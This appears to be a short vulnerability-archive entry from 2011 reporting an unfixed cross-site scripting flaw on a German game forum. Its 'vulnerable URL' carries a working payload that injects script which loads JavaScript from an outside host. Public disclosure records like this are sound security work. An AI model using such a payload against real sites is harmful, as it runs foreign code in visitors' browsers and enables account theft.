Unfixed XSS vulnerability at de.forum.gpotato.eu

2011-12-28T00:00:00
ID XSSED:75094
Type xssed
Reporter crucki
Modified 2011-12-28T00:00:00

Description

Security researcher crucki, has submitted on 28/12/2011 a cross-site-scripting (XSS) vulnerability affecting de.forum.gpotato.eu, which at the time of submission ranked 12089 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 28/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://de.forum.gpotato.eu/Common/Aspx/ImageUpload/ImageUploadType1.asp?FCD=%22%3E%3Cscript%3Es=%22http://ompldr.org/vYnhqbw%22;r=%22\40%22;document.write%28%27%3Cscript%27+r+%27src%27+%27=%27+s+%27%3E\%3C\/script\%3E%27%29%3C/script%3E